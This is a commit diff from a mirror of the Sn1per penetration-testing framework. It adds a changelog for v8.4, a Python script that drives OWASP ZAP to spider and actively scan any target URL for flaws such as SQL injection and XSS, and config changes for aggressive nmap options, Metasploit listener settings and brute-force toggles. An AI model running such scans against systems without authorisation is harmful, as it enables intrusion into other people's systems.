mirror of https://github.com/1N3/Sn1per.git
Sn1per Community Edition by @xer0dayz - https://xerosecurity.com
This commit is contained in:
parent
896806fa8c
commit
bdcdfa4380
11
CHANGELOG.md
11
CHANGELOG.md
|
|
@ -1,6 +1,15 @@
|
|||
## CHANGELOG:
|
||||
* v8.4 - Fixed issue with airstrike mode not updated Sn1per Professional v8.0 host list
|
||||
* v8.4 - Added project "Sc0pe" active/passive vulnerability scanner
|
||||
* v8.4 - Added 68 new active sc0pe templates
|
||||
* v8.4 - Added 14 new passive sc0pe templates
|
||||
* v8.4 - Added OWASP ZAP API integration
|
||||
* v8.4 - Added 8 new Sn1per configuration templates (see /usr/share/sniper/conf/)
|
||||
* v8.4 - Added Gua (https://github.com/lc/gau)
|
||||
* v8.4 - Added rapiddns subdomain retrieval
|
||||
* v8.4 - Updated web content wordlists
|
||||
* v8.4 - Improved efficiency of 'web' and 'recon' mode scans
|
||||
* v8.4 - Fixed issue with dirsearch asterisk being used incorrectly
|
||||
* v8.4 - Fixed issue with airstrike mode not updated Sn1per Professional v8.0 host list
|
||||
* v8.3 - Added Github subdomain retrieval (requires API key/conf options enabled)
|
||||
* v8.3 - Added NMAP_OPTIONS setting to sniper.conf to configure optional NMap scan settings
|
||||
* v8.3 - Added option to specify custom Sn1per configuration via (-c) switch
|
||||
|
|
|
|||
|
|
@ -0,0 +1,509 @@
|
|||
#!/usr/bin/env python3
|
||||
|
||||
'''
|
||||
This script aims to be the most generic and the most explicit possible.
|
||||
It works with OWASP ZAP API Python client.
|
||||
To use it, you have to load the Python API client module and start ZAP
|
||||
|
||||
Before starting this script for the first time: Open ZAP, go to
|
||||
Tools -> Options -> API -> Generate random Key, copy and paste the key in the
|
||||
variable "apiKey" of the configuration area
|
||||
|
||||
This script is divided into two parts : a configuration area, where you have to
|
||||
change variables according to your needs, and the part with API calls.
|
||||
|
||||
Author : aine-rb on Github, from Sopra Steria - modified for Sn1per by @xer0dayz
|
||||
'''
|
||||
|
||||
import time
|
||||
from pprint import pprint
|
||||
from zapv2 import ZAPv2
|
||||
import sys, getopt
|
||||
|
||||
targetURL = str(sys.argv[1])
|
||||
|
||||
#######################################
|
||||
### BEGINNING OF CONFIGURATION AREA ###
|
||||
#######################################
|
||||
## The user only needs to change variable values bellow to make the script
|
||||
## work according to his/her needs. MANDATORY parameters must not be empty
|
||||
|
||||
# MANDATORY. Define the API key generated by ZAP and used to verify actions.
|
||||
apiKey=''
|
||||
|
||||
# MANDATORY. Define the listening address of ZAP instance
|
||||
localProxy = {"http": "http://127.0.0.1:8081", "https": "http://127.0.0.1:8081"}
|
||||
|
||||
# MANDATORY. True to create another ZAP session (overwrite the former if the
|
||||
# same name already exists), False to use an existing one
|
||||
isNewSession = True
|
||||
# MANDATORY. ZAP Session name
|
||||
sessionName = 'WebgoatSession'
|
||||
|
||||
# Define the list of global exclude URL regular expressions. List can be empty.
|
||||
# The expressions must follow the java.util.regex.Pattern class syntax
|
||||
# The following example excludes every single URL except http://localhost:8081
|
||||
globalExcludeUrl = ['^(?:(?!http:\/\/localhost:8081).*).$']
|
||||
|
||||
# MANDATORY. Define if an outgoing proxy server is used
|
||||
useProxyChain = False
|
||||
# MANDATORY only if useProxyChain is True, ignored otherwise.
|
||||
# Outgoing proxy address and port
|
||||
proxyAddress = 'my.corp.proxy'
|
||||
proxyPort = '8080'
|
||||
# Define the addresses to skip in case useProxyChain is True. Ignored
|
||||
# otherwise. List can be empty.
|
||||
skipProxyAddresses = ('127.0.0.1;'
|
||||
'localhost')
|
||||
# MANDATORY only if useProxyChain is True. Ignored otherwise.
|
||||
# Define if proxy server needs authentication
|
||||
useProxyChainAuth = False
|
||||
# MANDATORY only if useProxyChainAuth is True. Ignored otherwise
|
||||
proxyUsername = ''
|
||||
proxyPassword = ''
|
||||
proxyRealm = ''
|
||||
|
||||
# MANDATORY. Determine if a proxy script must be loaded. Proxy scripts are
|
||||
# executed for every request traversing ZAP
|
||||
useProxyScript = False
|
||||
# MANDATORY only if useProxyScript is True. Ignored otherwise
|
||||
proxyScriptName = 'proxyScript.js'
|
||||
# Script engine values: "Oracle Nashorn" for Javascript,
|
||||
# "jython" for python, "JSR 223 JRuby Engine" for ruby
|
||||
proxyScriptEngine = 'Oracle Nashorn'
|
||||
# Asolute local path
|
||||
proxyScriptFileName = '/zap/scripts/proxy/proxyScript.js'
|
||||
proxyScriptDescription = 'This is a description'
|
||||
|
||||
# MANDATORY. Determine if context must be configured then used during scans.
|
||||
# You have to set this parameter to True if you want that ZAP performs scans
|
||||
# from the point of view of a specific user
|
||||
useContextForScan = False
|
||||
|
||||
# MANDATORY only if useContextForScan is True. Ignored otherwise. Set value to
|
||||
# True to define a new context. Set value to False to use an existing one.
|
||||
defineNewContext = False
|
||||
# MANDATORY only if defineNewContext is True. Ignored otherwise
|
||||
contextName = 'WebGoat_script-based'
|
||||
# MANDATORY only if defineNewContext is False. Disregarded otherwise.
|
||||
# Corresponds to the ID of the context to use
|
||||
contextId = 0
|
||||
# Define Context Include URL regular expressions. Ignored if useContextForScan
|
||||
# is False. You have to put the URL you want to test in this list.
|
||||
contextIncludeURL = [targetURL + '.*']
|
||||
# Define Context Exclude URL regular expressions. Ignored if useContextForScan
|
||||
# is False. List can be empty.
|
||||
contextExcludeURL = ['http://localhost:8081/WebGoat/j_spring_security_logout',
|
||||
'http://localhost:8081/WebGoat/logout.mvc']
|
||||
|
||||
# MANDATORY only if useContextForScan is True. Ignored otherwise. Define the
|
||||
# session management method for the context. Possible values are:
|
||||
# "cookieBasedSessionManagement"; "httpAuthSessionManagement"
|
||||
sessionManagement = 'cookieBasedSessionManagement'
|
||||
|
||||
# MANDATORY only if useContextForScan is True. Ignored otherwise. Define
|
||||
# authentication method for the context. Possible values are:
|
||||
# "manualAuthentication"; "scriptBasedAuthentication"; "httpAuthentication";
|
||||
# "formBasedAuthentication"
|
||||
authMethod = 'scriptBasedAuthentication'
|
||||
|
||||
# MANDATORY only if authMethod is set to scriptBasedAuthentication.
|
||||
# Ignored otherwise
|
||||
authScriptName = 'TwoStepAuthentication.js'
|
||||
# Script engine values: Oracle Nashorn for Javascript
|
||||
# jython for python, JSR 223 JRuby Engine for ruby
|
||||
authScriptEngine = 'Oracle Nashorn'
|
||||
# Absolute local path
|
||||
authScriptFileName = '/zap/scripts/authentication/TwoStepAuthentication.js'
|
||||
authScriptDescription = 'This is a description'
|
||||
|
||||
# MANDATORY only if useContextForScan is True. Ignored otherwise. Each
|
||||
# name/value pair of authParams are expected to be "x-www-form-urlencoded"
|
||||
# Here is an example for scriptBasedAuthentication method:
|
||||
authParams = ('scriptName=' + authScriptName + '&'
|
||||
'Submission Form URL=http://localhost:8081/WebGoat/j_spring_security_check&'
|
||||
'Username field=username&'
|
||||
'Password field=password&'
|
||||
'Target URL=http://localhost:8081/WebGoat/welcome.mvc')
|
||||
## Here is an example for formBasedAuthentication method:
|
||||
#authParams = ('loginUrl=http://localhost:8081/WebGoat/j_spring_security_check&'
|
||||
# 'loginRequestData=username%3D%7B%25username%25%7D%26'
|
||||
# 'password%3D%7B%25password%25%7D')
|
||||
##Here is an example for httpAuthentication method:
|
||||
#authParams = ('hostname=http://www.example.com&'
|
||||
# 'realm=CORP\\administrator&'
|
||||
# 'port=80')
|
||||
|
||||
# MANDATORY only if useContextForScan is True. Ignored otherwise.
|
||||
# Set the value to True if a loggedin indicator must be used. False if it's a
|
||||
# logged out indicator that must be used
|
||||
isLoggedInIndicator = False
|
||||
# MANDATORY only if useContextForScan is True. Ignored otherwise.
|
||||
# Define either a loggedin or a loggedout indicator regular expression.
|
||||
# It allows ZAP to see if the user is always authenticated during scans.
|
||||
indicatorRegex = '\QLocation: http://localhost:8081/WebGoat/login.mvc\E'
|
||||
|
||||
|
||||
# MANDATORY only if useContextForScan is True. Ignored otherwise.
|
||||
# Set value to True to create new users, False otherwise
|
||||
createUser = False
|
||||
# MANDATORY only if createUser is True. Ignored otherwise. Define the list of
|
||||
# users, with name and credentials (in x-www-form-urlencoded format)
|
||||
## Here is an example with the script NashornTwoStepAuthentication.js:
|
||||
userList = [
|
||||
{'name': 'guest', 'credentials': 'Username=guest&Password=guest'},
|
||||
{'name': 'webgoat', 'credentials': 'Username=webgoat&Password=webgoat'}
|
||||
]
|
||||
## Here is an example with formBasedAuthentication:
|
||||
#userList = [
|
||||
# {'name': 'guest', 'credentials': 'username=guest&password=guest'},
|
||||
# {'name': 'webgoat', 'credentials': 'username=webgoat&password=webgoat'}
|
||||
#]
|
||||
|
||||
# MANDATORY only if useContextForScan is True. Ignored otherwise. List can be
|
||||
# empty. Define the userid list. Created users will be added to this list later
|
||||
userIdList = []
|
||||
|
||||
# MANDATORY. Define the target site to test
|
||||
#target = 'http://10.0.0.19/'
|
||||
target = targetURL
|
||||
# You can specify other URL in order to help ZAP discover more site locations
|
||||
# List can be empty
|
||||
applicationURL = ['']
|
||||
|
||||
# MANDATORY. Set value to True if you want to customize and use a scan policy
|
||||
useScanPolicy = False
|
||||
# MANDATORY only if useScanPolicy is True. Ignored otherwise. Set a policy name
|
||||
scanPolicyName = 'SQL Injection and XSS'
|
||||
# MANDATORY only if useScanPolicy is True. Ignored otherwise.
|
||||
# Set value to True to disable all scan types except the ones set in ascanIds,
|
||||
# False to enable all scan types except the ones set in ascanIds..
|
||||
isWhiteListPolicy = False
|
||||
# MANDATORY only if useScanPolicy is True. Ignored otherwise. Set the scan IDs
|
||||
# to use with the policy. Other scan types will be disabled if
|
||||
# isWhiteListPolicy is True, enabled if isWhiteListPolicy is False.
|
||||
# Use zap.ascan.scanners() to list all ascan IDs.
|
||||
## In the example bellow, the first line corresponds to SQL Injection scan IDs,
|
||||
## the second line corresponds to some XSS scan IDs
|
||||
ascanIds = [40018, 40019, 40020, 40021, 40022, 40024, 90018,
|
||||
40012, 40014, 40016, 40017]
|
||||
# MANDATORY only if useScanPolicy is True. Ignored otherwise. Set the alert
|
||||
# Threshold and the attack strength of enabled active scans.
|
||||
# Currently, possible values are:
|
||||
# Low, Medium and High for alert Threshold
|
||||
# Low, Medium, High and Insane for attack strength
|
||||
alertThreshold = 'Medium'
|
||||
attackStrength = 'Low'
|
||||
|
||||
# MANDATORY. Set True to use Ajax Spider, False otherwise.
|
||||
useAjaxSpider = True
|
||||
|
||||
# MANDATORY. Set True to shutdown ZAP once finished, False otherwise
|
||||
shutdownOnceFinished = False
|
||||
|
||||
#################################
|
||||
### END OF CONFIGURATION AREA ###
|
||||
#################################
|
||||
sys.stdout = open("/usr/share/sniper/bin/zap-report.txt", "w")
|
||||
|
||||
# Connect ZAP API client to the listening address of ZAP instance
|
||||
zap = ZAPv2(proxies=localProxy, apikey=apiKey)
|
||||
|
||||
# Start the ZAP session
|
||||
core = zap.core
|
||||
if isNewSession:
|
||||
pprint('Create ZAP session: ' + sessionName + ' -> ' +
|
||||
core.new_session(name=sessionName, overwrite=True))
|
||||
else:
|
||||
pprint('Load ZAP session: ' + sessionName + ' -> ' +
|
||||
core.load_session(name=sessionName))
|
||||
|
||||
# Configure ZAP global Exclude URL option
|
||||
print('Add Global Exclude URL regular expressions:')
|
||||
for regex in globalExcludeUrl:
|
||||
pprint(regex + ' ->' + core.exclude_from_proxy(regex=regex))
|
||||
|
||||
# Configure ZAP outgoing proxy server connection option
|
||||
pprint('Enable outgoing proxy chain: ' + str(useProxyChain) + ' -> ' +
|
||||
core.set_option_use_proxy_chain(boolean=useProxyChain))
|
||||
if useProxyChain:
|
||||
pprint('Set outgoing proxy name: ' + proxyAddress + ' -> ' +
|
||||
core.set_option_proxy_chain_name(string=proxyAddress))
|
||||
pprint('Set outgoing proxy port: ' + proxyPort + ' -> ' +
|
||||
core.set_option_proxy_chain_port(integer=proxyPort))
|
||||
pprint('Skip names for outgoing proxy: ' + skipProxyAddresses + ' -> ' +
|
||||
core.set_option_proxy_chain_skip_name(string=skipProxyAddresses))
|
||||
|
||||
# Configure ZAP outgoing proxy server authentication
|
||||
pprint('Set outgoing proxy chain authentication: ' +
|
||||
str(useProxyChainAuth) + ' -> ' +
|
||||
core.set_option_use_proxy_chain_auth(boolean=useProxyChainAuth))
|
||||
if useProxyChainAuth:
|
||||
pprint('Set outgoing proxy username -> ' +
|
||||
core.set_option_proxy_chain_user_name(string=proxyUsername))
|
||||
pprint('Set outgoing proxy password -> ' +
|
||||
core.set_option_proxy_chain_password(string=proxyPassword))
|
||||
pprint('Set outgoing proxy realm: ' + proxyRealm + ' -> ' +
|
||||
core.set_option_proxy_chain_realm(string=proxyRealm))
|
||||
|
||||
if useProxyScript:
|
||||
script = zap.script
|
||||
script.remove(scriptname=proxyScriptName)
|
||||
pprint('Load proxy script: ' + proxyScriptName + ' -> ' +
|
||||
script.load(scriptname=proxyScriptName, scripttype='proxy',
|
||||
scriptengine=proxyScriptEngine,
|
||||
filename=proxyScriptFileName,
|
||||
scriptdescription=proxyScriptDescription))
|
||||
pprint('Enable proxy script: ' + proxyScriptName + ' -> ' +
|
||||
script.enable(scriptname=proxyScriptName))
|
||||
|
||||
|
||||
if useContextForScan:
|
||||
# Define the ZAP context
|
||||
context = zap.context
|
||||
if defineNewContext:
|
||||
contextId = context.new_context(contextname=contextName)
|
||||
pprint('Use context ID: ' + contextId)
|
||||
|
||||
# Include URL in the context
|
||||
print('Include URL in context:')
|
||||
for url in contextIncludeURL:
|
||||
pprint(url + ' -> ' +
|
||||
context.include_in_context(contextname=contextName,
|
||||
regex=url))
|
||||
|
||||
# Exclude URL in the context
|
||||
print('Exclude URL from context:')
|
||||
for url in contextExcludeURL:
|
||||
pprint(url + ' -> ' +
|
||||
context.exclude_from_context(contextname=contextName,
|
||||
regex=url))
|
||||
|
||||
# Setup session management for the context.
|
||||
# There is no methodconfigparams to provide for both current methods
|
||||
pprint('Set session management method: ' + sessionManagement + ' -> ' +
|
||||
zap.sessionManagement.set_session_management_method(
|
||||
contextid=contextId, methodname=sessionManagement,
|
||||
methodconfigparams=None))
|
||||
|
||||
## In case we use the scriptBasedAuthentication method, load the script
|
||||
if authMethod == 'scriptBasedAuthentication':
|
||||
script = zap.script
|
||||
script.remove(scriptname=authScriptName)
|
||||
pprint('Load script: ' + authScriptName + ' -> ' +
|
||||
script.load(scriptname=authScriptName,
|
||||
scripttype='authentication',
|
||||
scriptengine=authScriptEngine,
|
||||
filename=authScriptFileName,
|
||||
scriptdescription=authScriptDescription))
|
||||
|
||||
# Define an authentication method with parameters for the context
|
||||
auth = zap.authentication
|
||||
pprint('Set authentication method: ' + authMethod + ' -> ' +
|
||||
auth.set_authentication_method(contextid=contextId,
|
||||
authmethodname=authMethod,
|
||||
authmethodconfigparams=authParams))
|
||||
# Define either a loggedin indicator or a loggedout indicator regexp
|
||||
# It allows ZAP to see if the user is always authenticated during scans
|
||||
if isLoggedInIndicator:
|
||||
pprint('Define Loggedin indicator: ' + indicatorRegex + ' -> ' +
|
||||
auth.set_logged_in_indicator(contextid=contextId,
|
||||
loggedinindicatorregex=indicatorRegex))
|
||||
else:
|
||||
pprint('Define Loggedout indicator: ' + indicatorRegex + ' -> ' +
|
||||
auth.set_logged_out_indicator(contextid=contextId,
|
||||
loggedoutindicatorregex=indicatorRegex))
|
||||
|
||||
# Define the users
|
||||
users = zap.users
|
||||
if createUser:
|
||||
for user in userList:
|
||||
userName = user.get('name')
|
||||
print('Create user ' + userName + ':')
|
||||
userId = users.new_user(contextid=contextId, name=userName)
|
||||
userIdList.append(userId)
|
||||
pprint('User ID: ' + userId + '; username -> ' +
|
||||
users.set_user_name(contextid=contextId, userid=userId,
|
||||
name=userName) +
|
||||
'; credentials -> ' +
|
||||
users.set_authentication_credentials(contextid=contextId,
|
||||
userid=userId,
|
||||
authcredentialsconfigparams=user.get('credentials')) +
|
||||
'; enabled -> ' +
|
||||
users.set_user_enabled(contextid=contextId, userid=userId,
|
||||
enabled=True))
|
||||
|
||||
# Enable all passive scanners (it's possible to do a more specific policy by
|
||||
# setting needed scan ID: Use zap.pscan.scanners() to list all passive scanner
|
||||
# IDs, then use zap.scan.enable_scanners(ids) to enable what you want
|
||||
pprint('Enable all passive scanners -> ' +
|
||||
zap.pscan.enable_all_scanners())
|
||||
|
||||
ascan = zap.ascan
|
||||
# Define if a new scan policy is used
|
||||
if useScanPolicy:
|
||||
ascan.remove_scan_policy(scanpolicyname=scanPolicyName)
|
||||
pprint('Add scan policy ' + scanPolicyName + ' -> ' +
|
||||
ascan.add_scan_policy(scanpolicyname=scanPolicyName))
|
||||
for policyId in range(0, 5):
|
||||
# Set alert Threshold for all scans
|
||||
ascan.set_policy_alert_threshold(id=policyId,
|
||||
alertthreshold=alertThreshold,
|
||||
scanpolicyname=scanPolicyName)
|
||||
# Set attack strength for all scans
|
||||
ascan.set_policy_attack_strength(id=policyId,
|
||||
attackstrength=attackStrength,
|
||||
scanpolicyname=scanPolicyName)
|
||||
if isWhiteListPolicy:
|
||||
# Disable all active scanners in order to enable only what you need
|
||||
pprint('Disable all scanners -> ' +
|
||||
ascan.disable_all_scanners(scanpolicyname=scanPolicyName))
|
||||
# Enable some active scanners
|
||||
pprint('Enable given scan IDs -> ' +
|
||||
ascan.enable_scanners(ids=ascanIds,
|
||||
scanpolicyname=scanPolicyName))
|
||||
else:
|
||||
# Enable all active scanners
|
||||
pprint('Enable all scanners -> ' +
|
||||
ascan.enable_all_scanners(scanpolicyname=scanPolicyName))
|
||||
# Disable some active scanners
|
||||
pprint('Disable given scan IDs -> ' +
|
||||
ascan.disable_scanners(ids=ascanIds,
|
||||
scanpolicyname=scanPolicyName))
|
||||
else:
|
||||
print('No custom policy used for scan')
|
||||
scanPolicyName = None
|
||||
|
||||
# Open URL inside ZAP
|
||||
pprint('Access target URL ' + target)
|
||||
core.access_url(url=target, followredirects=True)
|
||||
for url in applicationURL:
|
||||
pprint('Access URL ' + url)
|
||||
core.access_url(url=url, followredirects=True)
|
||||
# Give the sites tree a chance to get updated
|
||||
time.sleep(2)
|
||||
|
||||
# Launch Spider, Ajax Spider (if useAjaxSpider is set to true) and
|
||||
# Active scans, with a context and users or not
|
||||
forcedUser = zap.forcedUser
|
||||
spider = zap.spider
|
||||
ajax = zap.ajaxSpider
|
||||
scanId = 0
|
||||
print('Starting Scans on target: ' + target)
|
||||
if useContextForScan:
|
||||
for userId in userIdList:
|
||||
print('Starting scans with User ID: ' + userId)
|
||||
|
||||
# Spider the target and recursively scan every site node found
|
||||
scanId = spider.scan_as_user(contextid=contextId, userid=userId,
|
||||
url=target, maxchildren=None, recurse=True, subtreeonly=None)
|
||||
print('Start Spider scan with user ID: ' + userId +
|
||||
'. Scan ID equals: ' + scanId)
|
||||
# Give the spider a chance to start
|
||||
time.sleep(2)
|
||||
while (int(spider.status(scanId)) < 100):
|
||||
print('Spider progress: ' + spider.status(scanId) + '%')
|
||||
time.sleep(2)
|
||||
print('Spider scan for user ID ' + userId + ' completed')
|
||||
|
||||
if useAjaxSpider:
|
||||
# Prepare Ajax Spider scan
|
||||
pprint('Set forced user mode enabled -> ' +
|
||||
forcedUser.set_forced_user_mode_enabled(boolean=True))
|
||||
pprint('Set user ID: ' + userId + ' for forced user mode -> ' +
|
||||
forcedUser.set_forced_user(contextid=contextId,
|
||||
userid=userId))
|
||||
# Ajax Spider the target URL
|
||||
pprint('Ajax Spider the target with user ID: ' + userId + ' -> ' +
|
||||
ajax.scan(url=target, inscope=None))
|
||||
# Give the Ajax spider a chance to start
|
||||
time.sleep(10)
|
||||
while (ajax.status != 'stopped'):
|
||||
print('Ajax Spider is ' + ajax.status)
|
||||
time.sleep(5)
|
||||
for url in applicationURL:
|
||||
# Ajax Spider every url configured
|
||||
pprint('Ajax Spider the URL: ' + url + ' with user ID: ' +
|
||||
userId + ' -> ' +
|
||||
ajax.scan(url=url, inscope=None))
|
||||
# Give the Ajax spider a chance to start
|
||||
time.sleep(10)
|
||||
while (ajax.status != 'stopped'):
|
||||
print('Ajax Spider is ' + ajax.status)
|
||||
time.sleep(5)
|
||||
pprint('Set forced user mode disabled -> ' +
|
||||
forcedUser.set_forced_user_mode_enabled(boolean=False))
|
||||
print('Ajax Spider scan for user ID ' + userId + ' completed')
|
||||
|
||||
# Launch Active Scan with the configured policy on the target url
|
||||
# and recursively scan every site node
|
||||
scanId = ascan.scan_as_user(url=target, contextid=contextId,
|
||||
userid=userId, recurse=True, scanpolicyname=scanPolicyName,
|
||||
method=None, postdata=True)
|
||||
print('Start Active Scan with user ID: ' + userId +
|
||||
'. Scan ID equals: ' + scanId)
|
||||
# Give the scanner a chance to start
|
||||
time.sleep(2)
|
||||
while (int(ascan.status(scanId)) < 100):
|
||||
print('Active Scan progress: ' + ascan.status(scanId) + '%')
|
||||
time.sleep(2)
|
||||
print('Active Scan for user ID ' + userId + ' completed')
|
||||
|
||||
else:
|
||||
# Spider the target and recursively scan every site node found
|
||||
scanId = spider.scan(url=target, maxchildren=None, recurse=True,
|
||||
contextname=None, subtreeonly=None)
|
||||
print('Scan ID equals ' + scanId)
|
||||
# Give the Spider a chance to start
|
||||
time.sleep(2)
|
||||
while (int(spider.status(scanId)) < 100):
|
||||
print('Spider progress ' + spider.status(scanId) + '%')
|
||||
time.sleep(2)
|
||||
print('Spider scan completed')
|
||||
|
||||
if useAjaxSpider:
|
||||
# Ajax Spider the target URL
|
||||
pprint('Start Ajax Spider -> ' + ajax.scan(url=target, inscope=None))
|
||||
# Give the Ajax spider a chance to start
|
||||
time.sleep(10)
|
||||
while (ajax.status != 'stopped'):
|
||||
print('Ajax Spider is ' + ajax.status)
|
||||
time.sleep(5)
|
||||
for url in applicationURL:
|
||||
# Ajax Spider every url configured
|
||||
pprint('Ajax Spider the URL: ' + url + ' -> ' +
|
||||
ajax.scan(url=url, inscope=None))
|
||||
# Give the Ajax spider a chance to start
|
||||
time.sleep(10)
|
||||
while (ajax.status != 'stopped'):
|
||||
print('Ajax Spider is ' + ajax.status)
|
||||
time.sleep(5)
|
||||
print('Ajax Spider scan completed')
|
||||
|
||||
# Launch Active scan with the configured policy on the target url and
|
||||
# recursively scan every site node
|
||||
scanId = zap.ascan.scan(url=target, recurse=True, inscopeonly=None,
|
||||
scanpolicyname=scanPolicyName, method=None, postdata=True)
|
||||
print('Start Active scan. Scan ID equals ' + scanId)
|
||||
while (int(ascan.status(scanId)) < 100):
|
||||
print('Active Scan progress: ' + ascan.status(scanId) + '%')
|
||||
time.sleep(5)
|
||||
print('Active Scan completed')
|
||||
|
||||
# Give the passive scanner a chance to finish
|
||||
time.sleep(5)
|
||||
|
||||
# If you want to retrieve alerts:
|
||||
## pprint(zap.core.alerts(baseurl=target, start=None, count=None))
|
||||
|
||||
# To retrieve ZAP report in XML or HTML format
|
||||
## print('XML report')
|
||||
## core.xmlreport()
|
||||
print('HTML report:')
|
||||
pprint(core.htmlreport())
|
||||
|
||||
if shutdownOnceFinished:
|
||||
# Shutdown ZAP once finished
|
||||
pprint('Shutdown ZAP -> ' + core.shutdown())
|
||||
|
||||
sys.stdout.close()
|
||||
File diff suppressed because one or more lines are too long
|
|
@ -16,14 +16,14 @@ AUTOBRUTE="0"
|
|||
FULLNMAPSCAN="0"
|
||||
OSINT="0"
|
||||
ENABLE_AUTO_UPDATES="1"
|
||||
ONLINE=""
|
||||
# ONLINE="1"
|
||||
REPORT="1"
|
||||
LOOT="1"
|
||||
METASPLOIT_IMPORT="0"
|
||||
SC0PE_VULNERABLITY_SCANNER="1"
|
||||
|
||||
# SN1PER PROFESSIONAL SETTINGS
|
||||
SNIPER_PRO_CONSOLE_OUTPUT="0"
|
||||
SN1PER_AUTOLOAD="0"
|
||||
SN1PER_AUTOLOAD="1"
|
||||
MAX_HOSTS="2000"
|
||||
|
||||
# DEFAULT BROWSER
|
||||
|
|
@ -41,13 +41,14 @@ OPENVAS_USERNAME="admin"
|
|||
OPENVAS_PASSWORD=""
|
||||
|
||||
# METASPLOIT SCANNER CONFIG
|
||||
METASPLOIT_IMPORT="0"
|
||||
MSF_LHOST="127.0.0.1"
|
||||
MSF_LPORT="4444"
|
||||
|
||||
# SHODAN API KEY
|
||||
SHODAN_API_KEY=""
|
||||
|
||||
# API KEYS
|
||||
# CENSYS API KEYS
|
||||
CENSYS_APP_ID=""
|
||||
CENSYS_API_SECRET=""
|
||||
|
||||
|
|
@ -58,26 +59,26 @@ HUNTERIO_KEY=""
|
|||
GITHUB_API_KEY=""
|
||||
|
||||
# SLACK API
|
||||
SLACK_NOTIFICATIONS="0"
|
||||
SLACK_API_TOKEN=""
|
||||
SLACK_NOTIFICATIONS="0"
|
||||
SLACK_NOTIFICATIONS_THEHARVESTER="0"
|
||||
SLACK_NOTIFICATIONS_EMAIL_SECURITY="0"
|
||||
SLACK_NOTIFICATIONS_DOMAINS_NEW="1"
|
||||
SLACK_NOTIFICATIONS_TAKEOVERS_NEW="1"
|
||||
SLACK_NOTIFICATIONS_SUBOVER_NEW="1"
|
||||
SLACK_NOTIFICATIONS_SUBJACK_NEW="1"
|
||||
SLACK_NOTIFICATIONS_S3_BUCKETS="1"
|
||||
SLACK_NOTIFICATIONS_DOMAINS_NEW="0"
|
||||
SLACK_NOTIFICATIONS_TAKEOVERS_NEW="0"
|
||||
SLACK_NOTIFICATIONS_SUBOVER_NEW="0"
|
||||
SLACK_NOTIFICATIONS_SUBJACK_NEW="0"
|
||||
SLACK_NOTIFICATIONS_S3_BUCKETS="0"
|
||||
SLACK_NOTIFICATIONS_SUBNETS="0"
|
||||
SLACK_NOTIFICATIONS_DIRSEARCH_NEW="1"
|
||||
SLACK_NOTIFICATIONS_SPIDER_NEW="1"
|
||||
SLACK_NOTIFICATIONS_DIRSEARCH_NEW="0"
|
||||
SLACK_NOTIFICATIONS_SPIDER_NEW="0"
|
||||
SLACK_NOTIFICATIONS_WHATWEB="0"
|
||||
SLACK_NOTIFICATIONS_NMAP="1"
|
||||
SLACK_NOTIFICATIONS_NMAP_DIFF="1"
|
||||
SLACK_NOTIFICATIONS_BRUTEFORCE="1"
|
||||
SLACK_NOTIFICATIONS_NMAP="0"
|
||||
SLACK_NOTIFICATIONS_NMAP_DIFF="0"
|
||||
SLACK_NOTIFICATIONS_BRUTEFORCE="0"
|
||||
SLACK_NOTIFICATIONS_WHOIS="0"
|
||||
SLACK_NOTIFICATIONS_METAGOOFIL="0"
|
||||
SLACK_NOTIFICATIONS_ARACHNI_SCAN="1"
|
||||
SLACK_NOTIFICATIONS_EMAIL_FORMAT="1"
|
||||
SLACK_NOTIFICATIONS_ARACHNI_SCAN="0"
|
||||
SLACK_NOTIFICATIONS_EMAIL_FORMAT="0"
|
||||
|
||||
# WEB BRUTE FORCE WORDLISTS
|
||||
WEB_BRUTE_STEALTH="$INSTALL_DIR/wordlists/web-brute-stealth.txt"
|
||||
|
|
@ -106,7 +107,7 @@ FLYOVER_MAX_HOSTS="5"
|
|||
FLYOVER_DELAY="10"
|
||||
|
||||
# NMAP OPTIONS
|
||||
NMAP_OPTIONS="-sV -Pn -O -v --script-args http.useragent=''"
|
||||
NMAP_OPTIONS="-sV -Pn -O --osscan-guess --max-os-tries 1 --privileged -n -PE -v --max-retries 3 --min-rtt-timeout 500ms --max-rtt-timeout 3000ms --initial-rtt-timeout 500ms --defeat-rst-ratelimit --min-rate 450 --max-rate 15000 --script-args=vulns.showall --script-timeout 180 --data-length=50 --script-args http.useragent='' --min-parallelism 100"
|
||||
|
||||
# NMAP PORT CONFIGURATIONS
|
||||
QUICK_PORTS="21,22,23,25,53,80,110,111,135,137,138,139,143,161,162,443,445,512,513,514,993,995,1099,1433,1723,3306,3389,4444,5000,5001,5104,5555,5432,5555,5800,5900,5901,6093,6095,6443,6667,7000,7001,7002,8009,8080,8081,8082,8089,8220,8443,8888,8000,9080,9443,10000,10250,49180"
|
||||
|
|
@ -122,6 +123,7 @@ THREADS="100"
|
|||
# NETWORK PLUGINS
|
||||
NMAP_SCRIPTS="1"
|
||||
METASPLOIT_EXPLOIT="0"
|
||||
MSF_LEGACY_WEB_EXPLOITS="0"
|
||||
SSH_AUDIT="0"
|
||||
SHOW_MOUNT="0"
|
||||
RPC_INFO="0"
|
||||
|
|
@ -176,6 +178,7 @@ WAYBACKMACHINE="1"
|
|||
SSL="0"
|
||||
PASSIVE_SPIDER="1"
|
||||
HACKERTARGET="1"
|
||||
GUA="1"
|
||||
CUTYCAPT="0"
|
||||
WEBSCREENSHOT="1"
|
||||
|
||||
|
|
@ -203,4 +206,5 @@ SHODAN="1"
|
|||
ASN_CHECK="1"
|
||||
SPYSE="1"
|
||||
SUBBRUTE_DNS="0"
|
||||
GITHUB_SUBDOMAINS="1"
|
||||
GITHUB_SUBDOMAINS="1"
|
||||
RAPIDDNS="1"
|
||||
|
|
@ -16,14 +16,14 @@ AUTOBRUTE="0"
|
|||
FULLNMAPSCAN="0"
|
||||
OSINT="0"
|
||||
ENABLE_AUTO_UPDATES="1"
|
||||
ONLINE=""
|
||||
# ONLINE="1"
|
||||
REPORT="1"
|
||||
LOOT="1"
|
||||
METASPLOIT_IMPORT="0"
|
||||
SC0PE_VULNERABLITY_SCANNER="1"
|
||||
|
||||
# SN1PER PROFESSIONAL SETTINGS
|
||||
SNIPER_PRO_CONSOLE_OUTPUT="0"
|
||||
SN1PER_AUTOLOAD="0"
|
||||
SN1PER_AUTOLOAD="1"
|
||||
MAX_HOSTS="2000"
|
||||
|
||||
# DEFAULT BROWSER
|
||||
|
|
@ -41,13 +41,14 @@ OPENVAS_USERNAME="admin"
|
|||
OPENVAS_PASSWORD=""
|
||||
|
||||
# METASPLOIT SCANNER CONFIG
|
||||
METASPLOIT_IMPORT="0"
|
||||
MSF_LHOST="127.0.0.1"
|
||||
MSF_LPORT="4444"
|
||||
|
||||
# SHODAN API KEY
|
